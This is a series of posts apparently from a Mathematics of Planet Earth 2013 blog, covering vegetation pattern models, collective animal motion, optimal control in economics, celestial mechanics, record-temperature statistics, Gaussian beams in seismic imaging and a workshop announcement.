    Hence, vegetation in semi-arid environments (or regions with low rainfall) self-organizes into patterns or “bands.” The pattern formation occurs where stripes of vegetation run parallel to the contours of a hill, and are interlaced with stripes of bare ground. Banded vegetation is common where there is low rainfall. In a paper published last month in the SIAM Journal on Applied Mathematics, author Jonathan A. Sherratt uses a mathematical model to determine the levels of precipitation within which such pattern formation occurs.

    “Vegetation patterns are a common feature in semi-arid environments, occurring in Africa, Australia and North America,” explains Sherratt. “Field studies of these ecosystems are extremely difficult because of their remoteness and physical harshness; moreover there are no laboratory replicates. Therefore mathematical modeling has the potential to be an extremely valuable tool, enabling prediction of how pattern vegetation will respond to changes in external conditions.”

    Several mathematical models have attempted to address banded vegetation in semi-arid environments, of which the oldest and most established is a system of partial differential equations, called the Klausmeier model.

    The Klausmeier model is based on a water redistribution hypothesis, which assumes that rain falling on bare ground infiltrates only slightly; most of it runs downhill in the direction of the next vegetation band. It is here that rain water seeps into the soil and promotes growth of new foliage. This implies that moisture levels are higher on the uphill edge of the bands. Hence, as plants compete for water, bands move uphill with each generation. This uphill migration of bands occurs as new vegetation grows upslope of the bands and old vegetation dies on the downslope edge.

    In this paper, the author uses the Klausmeier model, which is a system of reaction-diffusion-advection equations, to determine the critical rainfall level needed for pattern formation based on a variety of ecological parameters, such as rainfall, evaporation, plant uptake, downhill flow, and plant loss. He also investigates the uphill migration speeds of the bands. “My research focuses on the way in which patterns change as annual rainfall varies. In particular, I predict an abrupt shift in pattern formation as rainfall is decreased, which dramatically affects ecosystems,” says Sherratt. “The mathematical analysis enables me to derive a formula for the minimum level of annual rainfall for which banded vegetation is viable; below this, there is a transition to complete desert.”

    The model has value in making resource decisions and addressing environmental concerns. “Since many semi-arid regions with banded vegetation are used for grazing and/or timber, this prediction has significant implications for land management,” Sherratt says. “Another issue for which mathematical modeling can be of value is the resilience of patterned vegetation to environmental change. This type of conclusion raises the possibility of using mathematical models as an early warning system that catastrophic changes in the ecosystem are imminent, enabling appropriate action (such as reduced grazing).”

    The simplicity of the model allows the author to make detailed predictions, but more realistic models are required to further this work. “All mathematical models are a compromise between the complexity needed to adequately reflect real-world phenomena, and the simplicity that enables the application of mathematical methods. My paper concerns a relatively simple model for vegetation patterning, and I have been able to exploit this simplicity to obtain detailed mathematical predictions,” explains Sherratt. “A number of other researchers have proposed more realistic (and more complex) models, and corresponding study of these models is an important area for future work. The mathematical challenges are considerable, but the rewards would be great, with the potential to predict things such as critical levels of annual rainfall with a high degree of quantitative accuracy.”

    With 2013 being the year of “Mathematics of Planet Earth (MPE),” mathematics departments and societies across the world are highlighting the role of the mathematical sciences in the scientific effort to understand and deal with the multifaceted challenges facing our planet and our civilization. “The wider field of mathematical modeling of ecosystem-level phenomena has the potential to make a major and quite unique contribution to our understanding of our planet,” says Sherratt.

    View the complete nugget article here.
     
    Source Article:
    Jonathan A. Sherratt, Pattern Solutions of the Klausmeier Model for Banded Vegetation in Semi-arid Environments V: The Transition from Patterns to Desert, SIAM Journal on Applied Mathematics, 73 (4), 1347–1367 (Online publish date: July 3, 2013).
    The article will be available for free at the above link from September 4 – December 4, 2013.

    About the author:
    Jonathan A. Sherratt is a professor in the Department of Mathematics at Heriot-Watt University, and at Maxwell Institute for Mathematical Sciences in Edinburgh, United Kingdom.

    Posted in Biosphere, Mathematics, Patterns | Leave a comment

    The Unreasonable Effectiveness of Collective Animal Behavior

    Observing collective phenomena such as the movement of a flock of birds, a school of fish, or a migrating population of ungulates is a source of fascination because of the mystery behind the spontaneous formation of the aggregating behavior and the apparent cohesiveness of the movements. However, they can also be the cause of a major environmental and social problem when one thinks, for example, of the flight of a swarm of voracious locusts ravaging crops in various parts of the world and putting many communities under severe stress.

    Collective movement of animals can be defined as the spontaneous formation of animal groups and their coordinated motion. As a ubiquitous biological phenomenon, its study has intrinsic interest. But it is also critical for the design of strategies to prevent the process of aggregation of locusts before it happens, or to perturb or possibly stop its progression and the destruction of crops once it has started. On a lighter side, a dance company used the scientific study of collective behavior movements in an original initiative to bridge the gap between scientific and artistic languages.

    Collective movement of animals can be modeled in a Lagrangian mode or in an Eulerian mode. The Lagrangian mode is an “individual-based” modeling strategy, where the movements of individuals are simulated under simple rules for their mutual interactions. The emerging aggregations and collective motions are observed directly. The interaction rules can be defined in terms of distances between group members or topologically in terms of a collection of neighbors, independently of distance.

    In the Eulerian mode, one follows the evolution of animal densities using equations similar to those used in fluid dynamics or statistical mechanics. One makes hypotheses about the social interactions between individuals in a group in terms of repulsion, attraction, and alignment. Repulsion is strongest in a zone close to an individual, while attraction is strongest in a zone furthest from the subject. These two zones can overlap. and the alignment zone sits somewhere between the two zones. In the case of a herd of prey, individuals want to keep a comfortable distance between each other and repel the ones that are too close; on the other hand, an individual too far from the group is vulnerable to predators and will seek to get closer to the group. These social interactions are often nonlocal and can be modeled using integration of so-called interaction kernels. A typical example of an interaction kernel is a Gaussian function with its peak at the distance where the interaction is strongest. One can also define modes of communication corresponding to visual, auditive or tactile interactions and depending on whether individuals in a group move towards or away from each other. These modes of communication encode topological properties of the animal groups.

    Topaz et al. modeled locust aggregation using an Eulerian approach. They show that the solitary state of locusts becomes unstable as the population density reaches a critical value. They also show the occurrence of hysteresis in the gregarious mass fraction of locusts, which means that to dissolve a locust swarm, population densities have to be reduced to a level well below the critical density at which the swarm forms. This analysis suggests that control strategies that prevent the formation of swarms by limiting the population density would probably have more success than trying to reduce the population density once the swarm is formed.

    Theoretical and simulation studies with the above modeling methods help to demystify the mechanisms of collective motion. They produce new hypotheses for empirical studies and are also important in understanding and controlling insect invasions. Moreover, they have led to the development of new mathematics and improvement of numerical simulation algorithms. A better understanding of these collective phenomena does not remove any of the magic of the gracious ballet of a flock of birds; in fact, it adds to their enchantment.

    Pietro-Luciano Buono
    University of Ontario Institute of Technology (UOIT)
    Luciano.buono@uoit.ca

    References:

    • V. Grimm and S.F. Railsback. Individual-based Modeling and Ecology. Princeton University Press, 2005.
    • Ian Couzin’s lab: http://icouzin.princeton.edu/
    • M. Ballerini, N. Cabibbo, R. Candelier, A. Cavagna, E. Cisbani, I. Giardina, V. Lecomte, A. Orlandi, G. Parisi, A. Procaccini, M. Viale and V. Zdravkovic. Interaction ruling animal collective behavior depends on topological rather than metric distance: Evidence from a field study. PNAS 105, (2008), 1232-1237.
    • R. Eftimie, G. de Vries and M.A. Lewis. F. Lutscher. (2007). Modeling group formation and activity patterns in self-organizing collectives of individuals. Bulletin of Mathematical Biology: 69: 1537-1565.
    • C.M. Topaz, M.R. D’Orsogna, L. Edelstein-Keshet, A.J. Bernoff. Locust Dynamics: Behavioral Phase Change and Swarming. PloS Computational Biology 8, (2012).
    Posted in Biosphere, Mathematics, Patterns | Leave a comment

    Dynamic Programming for Optimal Control Problems in Economics

    Fausto Gozzi
    Libera Università Internazionale degli Studi Sociali (LUISS)
    Rome

    1. Some history

    The theory of optimal control, starting in the 50’s, has found many applications in various areas of natural and social sciences. Over the years, as more difficult applied problems have been attacked, the theory has made advances. Here we consider the optimal control theory of infinite dimensional systems that has recently found interesting applications in theoretical economics so that economic models can be made more realistic.

    These infinite dimensional systems are usually dynamical systems whose evolution is described by a partial differential equation (PDE) or a delay differential equation (DDE). They are infinite dimensional in the sense that they can be rephrased as standard ordinary differential equations (ODE’s) in abstract infinite dimensional spaces such as Hilbert or Banach spaces.

    The study of optimal control problems of such systems began in the 70’s with the two main methods of optimal control theory: Bellman’s Dynamic Programming and the Pontryagin Maximum Principle. The main examples motivating such theory usually came from physics and engineering applications, but starting in the 90’s more and more work in the field was motivated by economic and financial applications.

    Here we discuss the use of the Dynamic Programming Method with the associated Hamilton-Jacobi-Bellman (HJB) equations for a particular family of such problems that has been recently studied, namely, the optimal control of heterogeneous systems.

    2. Why model heteorogeneity in economics?

    Economic models have traditionally been built under several simplifying assumptions for a number of reasons, including tractability. Among the reasons, we consider the following three: the representative agent, the homogeneity of capital, and the absence of a spatial dimension.

    Considering a single agent to represent the average behaviour of a large number of consumers, for example, greatly simplifies the analysis of an economic system and has enabled the development of a large and coherent body of economic research. As an example, neoclassical growth theory, which has been tremendously influential, considers a representative consumer and a representative firm in place of thousands (or millions) of separate consumers and firms.

    Capital homogeneity, which is the lumping together all the forms of capital investment, including human capital and physical capital, is a second simplifying assumption often made in economics. Again the neoclassical growth theory makes this assumption and treats capital investments at different times (vintages) as identical. This, of course, is hardly realistic, since new vintages typically embody the latest technical improvements and are likely to be significantly more productive. This was clearly stated by Solow in 1960 when he wrote “…This conflicts with the casual observation that many if not most innovations need to be embodied in new kinds of durable equipment before they can be made effective…”

    Finally, while space has been recognized as a key dimension in several economic decision-making problems for quite a long time, it has been seldom explicitly incorporated even in the models of growth, trade and development where this dimension seems natural. This trend has lasted until the early 90’s as mentioned by Krugman (2010) in a retrospective essay: “…What you have to understand is that in the late 1980s mainstream economists were almost literally oblivious to the fact that economies aren’t dimensionless points in space and to what the spatial dimension of the economy had to say about the nature of economic forces…”

    Beyond analytical simplicity and internal consistency, the prevalence of such simplifying assumptions is due to the widely shared belief that departing from these assumptions would NOT improve our understanding of the main mechanisms behind the observed economic facts and would, at the same time, make economic models analytically intractable. But since the late 90’s, accounting for heterogeneity has become an essential aspect of research. The representative agent assumptions and other homogeneity assumptions have been heavily questioned, and new analytical frameworks explicitly incorporating heterogeneous agents and/or goods have been put forward and studied. Basically, this evolution is due to two important factors.

    • a. A major factor is the emerging view that heterogeneity is needed to explain key economic facts. For example, the resurgence of the vintage capital work in the late 90’s is fundamentally due to new statistical evidence on the price of durable goods in the US, showing a negative trend in the evolution of the relative price of equipment, only compatible with embodied technical progress, thus making legitimate the explicit vintage modelling of capital.
    • b. At the same time, the rapid development of computational economics—especially in the last decade—makes it feasible to deal with models having heterogeneous agents. Special issues of the reference journal in the field, Journal of Economic Dynamics and Control, have been devoted to this specific area (issue 1 in 2010 and issue 2 in 2011), suggesting that it is one of the hottest areas in the field of computational economics.

    3. An example of results

    We consider, for example, the vintage capital model. Beginning with the easiest neoclassical growth model (the so-called AK model) one generalizes it to the case when capital is heterogeneous in the sense that capital is differentiated by its age (vintage capital). The basic equation (the State Equation in the language of optimal control) becomes a differential delay equation. Using Bellman’s Dynamic Programming method it becomes possible to characterize the optimal trajectories, which “should” describe the behavior of economic system.

    In this case the introduction of heterogeneity allows a more faithful description of the features of this economic system. Indeed, in the graph below (Boucekkine et al.) one can see the behavior of the output y(t) (the production) of the model (after a detrending which is done for the sake of clarity) in the two cases:
    − the horizontal line is the output in the classical AK model;
    − the oscillating line is the output in the AK model with vintage capital.
    Graph
    Fluctuations of the output is a well known feature that is captured with infinite dimensional optimal control models.

    4. Further directions

    Further work needs to be done with heterogeneity resulting from the spatial and population distribution of economic activity. This heterogeneity is a key feature of contemporary economic systems and a deep study of such models incorporating heterogeneity should both provide more insight into the behavior of such systems and more help for policy makers making decisions. In particular the issues under study are:
    − environmentally sustainable growth regimes;
    − land use;
    − the socio-economic and public finance problems related to ageing on one hand, and to epidemiological threads on the other;
    − to incorporate the age-structure of human populations in the analysis of key economic decisions like investment in health and/or investment in pension funds both from and the private and social optimality points of view.

    References
    Giorgio Fabbri and Fausto Gozzi. Solving optimal growth models with vintage capital: the dynamic programming approach. Journal of Economic Theory 143 (2008), no. 1, 331–373.

    R. Boucekkine, O. Licandro, L.A. Puch, F. del Rio. Vintage capital and the dynamics of the AK model. Journal of Economic Theory 120 (2005), no. 1, 39–72.

    Posted in Economics | Leave a comment

    A Feast of Celestial Mechanics

    While I am a pure mathematician working in dynamical systems, I have always been fascinated by the mathematics of the N-body problem and its applications to celestial mechanics in general, and to the Solar system in particular. This is why I had insisted for the organization of a long-term program on celestial mechanics within MPE2013, and that CRM hosts a workshop on the the topic. The workshop Planetary Motions, Satellite Dynamics, and Spaceship Orbits took place at CRM on July 22-26. Co-organizers were Alessandra Celletti, Walter Craig and Florin Diacu.

    The week-long activity brought together the major players of the field. Surprisingly, many of these people had never met before, and the workshop played a structuring role in the community of scientists attached to the theme. The lectures were all inspiring and excellent. For an amateur like me, the workshop was like a school, and it has been an exceptionally rewarding experience.

    Planetary motions are usually modeled through the N-body problem, which is the study of trajectories of N mass particles subject to Newton’s law of gravitation. Since Poincaré, this problem has become the specialty of mathematicians. The underlying dynamical system is nonintegrable as soon as N>2. The lectures of the workshop covered the whole spectrum from N=3 to N very large. Several lectures dealt with the restricted 3-body problem, which is the limit case where two bodies move according to the 2-body problem on conics with a focus at their center of mass and a third body of zero mass is attracted by the two large bodies. This model is useful for studying the movements of objects like satellites, spatial engines or small asteroids subject to the attraction of two large celestial objects.

    In the case of N=3, it is known that there are five families of periodic synchronous motions for the three bodies: after a change of coordinates to a moving frame, these special trajectories become equilibrium positions in the new frame, called Lagrange equilibrium points (also libration points). Their associated invariant manifolds play an essential role in organizing the dynamics and the different types of motion. They provide low-energy pathways for interplanetary missions. They can have transversal crossings and help finding chaotic motions and Arnold diffusion.

    Several lectures described the normal forms and their applications. In particular, Gabriella Pinzari described her recent results with Luigi Chierchia showing the existence and nondegeneracy of a Birkhoff normal form for the planetary problem and its consequence for the existence of a large measure set of stable motions and lower-dimensional elliptic tori in phase space, thus solving a problem open for more than 50 years.

    Studying near-collision orbits is a challenge in the N-body problem. In the limit, the system becomes singular, and a desingularization process is necessary to understand the phenomenon. A geometric desingularization was presented by Richard Moeckel, while the lecture of Sergey Bolotin explained how a variational approach enables us to transform the problem to a billiard-type problem with elastic collisions.

    Edward Belbruno was a pioneer in low-energy trajectories. He became famous when his low-energy trajectories to the Moon found an application in 1990. The Japanese had lost contact with their space engine MUSES-B, which was supposed to go to the Moon. MUSES-A, renamed Hiten, was orbiting around the Earth. The low-energy trajectory of Belbruno allowed sending Hiten to the Moon in 1991 after 150 days travel. The idea was to use a transfer trajectory to the weak stability boundary of the Moon, with ballistic capture, i.e., no breaking necessary to be captured. Belbruno described his recent fascinating achievements showing the existence of low-energy routes enabling transfer of material between planetary systems, with transit times up to several hundred millions years. On the basis of this work it can no longer be excluded that the origin of life on Earth could come from a remote planetary system. I have invited him to describe the details of this fascinating result in a future blog on September 6.

    Too often, we have the image of the mechanics of the N-body problem as nondissipative. But it is in fact slightly dissipative (for instance, because of the atmosphere around the Earth which slows down its rotation around its axis), and KAM theory has been adapted to treat these cases. This dissipation plays a major role in getting stable motions and providing rigorous proofs of the stability of these motions with integer-arithmetic numerical techniques.

    Can we explain why the Solar system is exactly as we observe it? Several lectures addressed theis issue. While energy is dissipated, angular momentum is preserved. Hence, what is the minimal energy configuration for a N-body system with fixed angular momentum? Dan Scheeres showed that this ill-posed question becomes well-posed if, instead, the question is formulated accounting for finite density distributions, thus leading to a natural “granular mechanics” extension of celestial mechanics. The lecture of Vladislav Sidorenko addressed the problem of understanding the quasi-satellite regime of small celestial bodies like the asteroids and the route from the formation of the Solar system to its present state.

    The case with N large was covered by a spectrum of applications. Stanley Dermott presented the erosion of the asteroid belt under Martian resonances; Martin Duncan presented a model of core accretion for giant planet formation from billions of planetesimals and its numerical simulations; Anne Lemaitre explained the challenges of understanding the dynamics of the tens of thousands of space debris with diameter between 1 cm and 10 cm, which are too numerous to be followed individually but sufficiently large to represent a real danger. The motion of the debris is simulated with an accurate symplectic integration scheme and a model which takes into account the effects for solar radiation pressure and Earth shadow crossings. The goal is to understand where the space debris are more likely to accumulate. Jacques Laskar discussed the paleoclimate reconstruction through the past planetary motions of the Solar System: a strong resonance between the asteroids Ceres and Vesta prevents any precise reconstruction beyond 60 Myr, but a more regular oscillation of the eccentricity of the Earth with period 405 Kyr can nevertheless be used for calibrating climates over the entire Mezozoic era.

    This workshop has really been fascinating.

    Christiane Rousseau

    Posted in Computational Science, Mathematics, Workshop Report | Leave a comment

    Climate Science without Climate Models

    In June 2012, more than 3,000 daily maximum temperature records were broken or tied in the United States, according to the National Climatic Data Center (NCDC) of the U.S. National Oceanic and Atmospheric Administration (NOAA). Meteorologists commented at that time that this number was very unusual. By comparison, in June 2013, only about 1,200 such records were broken or tied. Was that number “normal”? Was it perhaps lower than expected? Was June 2012 (especially the last week of that month) perhaps just an especially warm time period, something that should be expected to happen every now and then? Also in June 2013, about 200 daily minimum temperature records were broken or tied in the United States. Shouldn’t that number be comparable to the number of record daily highs, if everything was “normal”?

    Surprisingly, it is possible to make fairly precise mathematical statements about such temperature extremes (or for that matter, about many other record-setting events) simply by reasoning, almost without any models. Well, not quite. The mathematical framework is that individual numerical observations are random variables. One then has to make a few assumptions. The two main assumptions are that (1) the circumstances under which observations are made do not change, and (2) observations are stochastically independent, that is, knowledge of some observations does not convey any information about any of the other observations. Let’s work with these assumptions for the moment and see what can be said about records.

    Suppose N numerical observations of a certain phenomenon have already been made and a new observation is added. What is the probability that this new observation exceeds all the previous ones? Think about it this way: Each of these N+1 observations has a rank, 1 for the largest value, and N+1 for the smallest value. (For the time being, let’s assume that there are no ties). Thus any particular sequence of N+1 observations defines a sequence of ranks, that is, a permutation of the numbers from 1 to N+1. Since observations are independent and have the same probability distribution (that’s what the two assumptions from above imply), all possible (N+1)! permutations are equally likely. A new record is observed during the last observation if its rank equals 1. There are N! permutations that have this additional property. Therefore, the probability that the last observation is a new record is N!/(N+1)! = 1/(N+1).

    This reasoning makes it possible to compute the expected number of record daily high temperatures for a given set of weather stations. For example, there are currently about 5,700 weather stations in the United States at which daily high temperatures are observed. In 1963, there were about 3,000 such stations and in 1923 only about 220. Assuming for simplicity that each of the current stations has been recording daily temperatures for 50 years, one would expect that on a typical day about 2% of all daily high records are broken, resulting in about 3,000 new daily high records per month on average – if the circumstances of temperature measurements remain the same and if the observations at any particular station are independent of each other. It is fairly clear that temperature records for the same date are indeed independent of one another for the same station: Knowing the maximum temperature at a particular location on August 27, 2013 does not give one any information about the maximum temperature on the same day a year later. However, circumstances of observations could indeed change for many different reasons. What if new equipment is used to record temperatures? What if the location of the station is changed? For example, until 1945, daily temperatures in Washington, DC, were recorded at a downtown location (24th and M St.). Since then, measurements have been made at National Airport. National Airport is adjacent to a river, which lowered daily temperatures measurements compared to downtown. The area around the airport has however become more urban over the last decades, possibly leading to higher temperature readings (the well-known urban heat island effect). And what about climate change?

    Perhaps it is better to use a single climate record and not thousands. Consider for example the global mean temperature record that is shown in the blog post of August 20. It shows that the largest global mean temperature for the 50 years from 1950 to 1999 (recorded in 1998) was exceeded twice in the 11 years from 2000 to 2010. The second-highest global mean temperature for these 50 years (that of 1997) was exceeded in 10 out of 11 years between 2000 to 2010. Can this be a coincidence?

    There is a mathematical theory to study such questions. Given a reference value equal to the $m$th largest out of $N$ observations, any observation out of $n$ additional ones that exceeds this reference value is called an “exceedance”. For example, we might be interested in the probability of observing two exceedances of the largest value out of 50 during 12 additional observations. A combinatorial argument implies that the probability of seeing $k$ exceedances of the $m$th largest observation out of $N$ when $n$ additional observations are made equals

    \[ \frac{C(N+k-m,N-m) C(m+n-k-1, m-1)}{C(N+n,N)} , \]

    where C(r,s) is the usual binomial coefficient. The crucial assumption is again that observations are independent and come from the same probability distribution.

    Applied to the global mean temperature record, the formula implies that the probability of two or more exceedances of a 50 year record during an 11 year period is no more than 3%. The probability of 10 exceedances of the second-highest observation from 50 years during an 11 year period is tiny – of the order of 0.0000001%. Yet these exceedances were actually observed during the last decade.

    Clearly, at least one of the assumptions of stochastic independence and of identical distribution must be violated. The plot of August 20 already shows that distributions may vary from year to year, due to El Niño/La Niña effects. La Niña years in particular tend to be cooler when averaged over the entire planet. The assumption of stochastic independence is also questionable, since global weather patterns can persist over months and therefore influence more than one year. Could it be that more exeedances than plausible were observed because global mean temperatures became generally more variable during the past decades? In that case, low exceedances of the minimum temperature would also have been observed more often than predicted by the formula. That’s clearly not the case, so that particular effect is unlikely to be solely responsible for what has been observed.

    We see that even this fairly simple climate record leads to serious questions and even partial answers about possible climate change, without any particular climate model.

    Part of this contribution is adapted from the forthcoming book Mathematics and Climate by Hans Kaper and Hans Engler; SIAM, Philadelphia, Pennsylvania, USA (OT131, October 2013).

    Posted in Climate, Extreme Events, Probability, Statistics | Leave a comment

    Biodiversity at SIAM Annual Meeting

    Biodiversity is a major concern today, with species vanishing at a high rate. Nations have launched efforts to preserve species by designating preserves or wilderness areas. Investments of money and resources are needed to establish and maintain such preserves. How does a nation or organization decide how to invest its funds and resources in order to maximize the goals of species preservation? This leads to interesting models and algorithms for optimization of resources, as Hugh Possingham pointed out in his invited presentation at the SIAM Annual Meeting in San Diego in July 2013 titled “Mathematical Problems in Conservation.” An audio version of the talk is available.

    This conference featured Mathematics of Planet Earth as a major theme, as many of the abstracts of invited talks will show.

    Posted in Biodiversity, Conference Report, Mathematics | Leave a comment

    Patterns on Earth

    A recurrent idea in science is that the loss of stability of an equilibrium position through diffusion can lead to the creation of patterns. The idea goes back to Turing in his famous 1952 paper “On the chemical basis of morphogenesis,” which proposes a model for morphogenesis through chemical reaction-diffusion. The same idea can explain the shapes on Earth. We practically never observe a large flat landscape of sand on Earth. Why? Indeed, on a flat area there would always be a few irregularities. When the wind starts blowing, sand grains are transported and deposited behind the irregularities, thus making them grow. After a while, we observe a pattern of dunes. The “diffusion” in this case comes from the wind. The same occurs when the wind induces a regular pattern of waves on the surface of the water. The original equilibrium, consisting of a flat surface area, loses its stability when the wind associated with the diffusion starts to blow. This loss of stability is associated with the appearance of another equilibrium, consisting of a pattern of regular dunes for the sand or of regular waves for the water.

    Patterns - Spot vegetation

    Spot vegetation around the ruins of Plazuelas in Mexico.

    Similar patterns can be observed for vegetation and, what is remarkable, they can also be explained through a reaction-diffusion model. I met Antonello Provenzale in Rome during the workshop “Models and Methods for Mathematics of Planet Earth” at the Istituto Nazionale di Alta Matematica (INdAM); he provided me references on the subject, including some of his own articles. The vegetation patterns occur in semi-arid regions, where there is not enough water for a full vegetation cover. What are the diffusing substances in the model? They are the vegetation on the one hand and the surface water and ground water on the other. The roots of the plants can use some of the water in the soil covered by no vegetation. Also, the vegetation protects the soil from evaporation, and this feed-back mechanism allows the persistence of the vegetation patches. The models predict four types of vegetation patterns, depending on the parameters, which can be the quantity of water and the slope of the surface:

    • Spots are observed in the most arid conditions;
    • When there is more water, we can observe labyrinths;
    • The last pattern before full vegetation is isolated gaps;
    • Finally, stripes are observed when the surface is slanted.

    These four types are observed in vegetation patterns occurring in nature. And, what is more remarkable, they are the same patterns that are observed in animal coatings and well explained through a reaction-diffusion model!

    The model explaining vegetation patterns exhibits hysteresis. What does it mean? If the quantity of water is above a threshold allowing for a patched vegetation pattern but below the quantity of water necessary for a full vegetation pattern, then we have two stable equilibria: one with no vegetation, and one with a vegetation pattern. If the quantity of water decreases below the threshold, the vegetation pattern disappears and the land becomes a desert. But it is not sufficient that the water comes back above the threshold to restore the vegetation. Indeed, the feedback mechanisms are no more present and cannot help to the development of new vegetation patches on a desert: a higher level of water is needed to restore some vegetation. The lesson is that it is much easier to prevent desertification than to restore vegetation once it has disappeared.

    Christiane Rousseau

    Posted in Biosphere, Mathematics, Patterns | 1 Comment

    Gaussian Beams

    Nick Tanushev, Chief Scientist, Z-Terra, Inc.

    Like most animals, we have passive sensors that let us observe the world around us. Our eyes let us see light scattered by objects, our ears let us hear sound that is emitted around us and our skin lets us feel warmth. However, we rely on something to generate light, sound or heat for us to observe. One animal that is an exception to this is the bat. Bats use echolocation for navigation and finding prey. That is, they do not passively listen for sound, they actively generate sound pulses and listen for what comes back to figure out where they are and what’s for lunch.

    From an applied mathematical point of view, active sensing using waves is a complex process. Waves generated by the active source have to be modeled as they propagate to an object, reflect and then arrive back at the receiver. Using the amplitude, phase, time lag and possibly other properties of the waves, we have to make inferences about the location of the object that reflected the waves and its properties. It is logical at this moment to ask “Well, if it is such a complex task, how can bats do it so easily?” The answer is that bats use a simplified model of wave propagation. In nearly constant media, such as air, high frequency waves propagate is straight lines and determining the distance between the bat and the object is simply a matter of the time it takes to hear the echo back and the speed of wave propagation. Our brain also uses the same trick to process what our eyes are seeing. You can easily convince yourself with an old elementary school trick: Put a pencil in a clear glass of water so that half of it is submerged and lean the pencil on the side so that it is not completely vertical. Looking from the side, it looks as if that the pencil is broken at the air water interface. Of course, this is an optical illusion because our brain assumes that light has traveled in a straight line when, in fact, it takes two different paths depending on whether it is propagating in the water or in the air.

    A much more sophisticated version of echolocation is used by oil companies to image the subsurface of the earth. A classical description of the equipment used to collect data is a boat that has an active source (an air gun) and a set of receivers (hydrophones) that it drags behind it. The air gun generates waves, these waves propagate, reflect from structures in the earth and return to the hydrophones where they are recorded. The big difference is that seismic waves do not move along straight lines because the earth is composed of many different layers with varying composition. As a result the speed of propagation varies and waves take a complicated path through the earth.

    Using the collected seismic data, an image of the subsurface is formed by starting with a rough estimate for the velocity, modelling the source forward in time and the receiver wave fields backward in time using the wave equation. The source and receiver wave fields are then cross correlated in time to produce an image of the earth. The mismatch between images formed from different source and receiver pairs can be used to get a better estimate of the velocity. The process is iterated to improve the velocity. Thus, the key to building a good model of the subsurface is being able to solve the wave equation quickly and accurately many times. Direct discretization of the wave equation is computationally too expensive and, like the bats, we have to find a simplified model of wave propagation which models the wave propagation to a good enough accuracy and can be solved rapidly. Asymptotic methods valid for high frequency waves are used to model the wave propagation. Seismic waves are not considered particularly high frequency, but “high frequency” really means that the wave length is small compared to the size of the simulation domain and the variations of the wave propagation speed and in this case both of these assumptions are valid.

    The most commonly used method is based on geometric optics, also referred to as WKB or ray-tracing. The key idea is to represent the wave field using an amplitude function and a phase function. Usually, these functions are slowly varying (when compared to the wave oscillations) and can be represented numerically by far less points than the original wave field. However, there is no free lunch and this gain comes at the price that the partial differential equation for the phase function is non-linear. One major problem is that the equation for the phase can only be solved classically for short time and we have to use more exotic solutions such as viscosity solutions after that. This departure from a classical solution is an observable phenomenon called “caustic regions” and we have all observed them as the dancing bright spots at the bottom of a pool. At caustic regions, waves arrive in phase and can no longer be represented using a single phase functions.

    More recently, an alternative method to geometric optics, called Gaussian beams, has gained popularity. Gaussian beams are asymptotic high frequency wave solutions to 
hyperbolic partial differential equation (such as the wave equation) that are concentrated on a single curve. Gaussian beams are a packed of waves that propagate coherently. An easy example to think about is a laser pointer. It forms a tight beam of light that is concentrated along a single line. Gaussian beams are essentially the same, except that the width of the beam is much smaller and in media with varying speed of wave propagation, the curves are not necessary a straight line. The amplitude of this coherent packet of waves decays like a Gaussian distribution and gives them their name. One of the most important features of Gaussian beams
 is that they remain regular for all time and do not breakdown at caustics. The trick to making Gaussian beams a useful tool for solving the wave equation is to recognize that since the wave equation is linear, we can take many different Gaussian beams and add them together and still obtain an approximate solution to the wave equation. Such superpositions of Gaussian beams allow us to approximate solutions that are not necessarily concentrated on a single curve. Since each Gaussian beam does not breakdown at a caustic, neither will their superposition.

    The existence of
 Gaussian beam solutions has been know since the 1960s, first in connection with 
lasers. Later, they were
 used in pure mathematics to analyse the propagation of singularities in partial differential equations. Since the 1970s, Gaussian beams have been used sporadically in applied mathematics research with a major industrial success in imaging earth is sub-salt regions in the Gulf of Mexico in the mid 1980s. From a mathematics point of view, questions about the accuracy of Gaussian beam superposition solutions and the rate of convergence to the exact solution has only been answered in the last ten years, justifying the use of such solutions in numerical methods.

    Gaussian BeamSingle Gaussian beam: Several snap-shots of he real part of the wave field for a Gaussian beam are shown. Time flows along the plotted curve, which shows the path of the packet of waves.
    Gaussian Beam SuperpositionGaussian beam superpositions: Several snap-shots of he real part of the wave field for a Gaussian beam superposition beam are shown. The plotted 
lines are the curves for each Gaussian beam.
 Note that the wave field remains regular at the caustics, where the curves cross
 and traditional asymptotic methods breakdown.
    Posted in Energy, Imaging, Mathematics | Leave a comment

    MPE2013+ Workshop at ASU, January 7-10, 2014

    A workshop “Mathematics of Planet Earth: Challenges and Opportunities” will be held at Arizona State University, January 7-10, 2014. The workshop aims to expose students and junior researchers to the challenges facing our planet, the role of the mathematical sciences in addressing those challenges, and the opportunities to get involved in the effort. Financial support is available to support participants to attend this workshop and to participate in follow-up activities.

    About Mathematics of Planet Earth 2013-Plus (MPE2013+): The Center for Discrete Mathematics and Theoretical Computer Science (DIMACS) is sponsoring a new program, MPE2013+. This program, whcih is an outgrowth of Mathematics of Planet Earth 2013, will consist of a series of workshop clusters scheduled throughout 2014 and 2015 and will focus on research issues concerning several sustainability topics: Management of Natural Resources, Global Change, Natural Disasters, Sustainable Human Environments, and Data-aware Energy Use. Each workshop is planned to encourage research and address fundamental questions in the topic area. Follow-up activities are also planned throughout 2014 and 2015. For more information on MPE2013+, visit the MPE2013+ website.

    How to Apply: Information on the workshop can be found here. Applications by students and junior researchers interested in receiving financial support to attend the workshop are now being accepted. Review of applications will begin on October 1, 2013 and will continue until all slots are filled.

    For more information about the MPE2013+ program and workshop, please contact Dr. Eugene Fiorini at mpe2013plus@dimacs.rutgers.edu.

    Posted in Climate, Climate Change, Energy, Natural Disasters, Resource Management, Sustainability, Workshop Announcement | Leave a comment

    Extreme Events

    Weather extremes capture the public’s attention and are often used as arguments in the debate about climate change. In daily life, the term extreme event can refer, for example, to an event whose intensity exceeds expectations, or an event with high impact, or an event that is rare or even unprecedented in the historical record. Some of these notions may hit the mark, but they need to be quantified if we want to make them useful for a rational discussion of climate change. The concern that extreme events may be changing in frequency and intensity as a result of human influences on climate is real, but the notion of extreme events depends to a large degree on the system under consideration, including its vulnerability, resiliency, and capacity for adaptation and mitigation.

    Since extreme events play such an important role in the current discussion of climate change, it is important that we get their statistics right. The assessment of extremes must be based on long-term observational records and a statistical model of the particular weather or climate element under consideration. The proper framework for their study is probability theory—an important topic of mathematics. The recent special report on managing the risks of extreme events (SREX) prepared by the IPCC describes an extreme event as the “occurrence of a value of a weather or climate variable above (or below) a threshold value near the upper (or lower) ends of the range of observed values of the variable.” Normally, the threshold is put at the 10th or 90th percentile of the observed probability distribution function, but other choices of the thresholds may be appropriate given the particular circumstances.

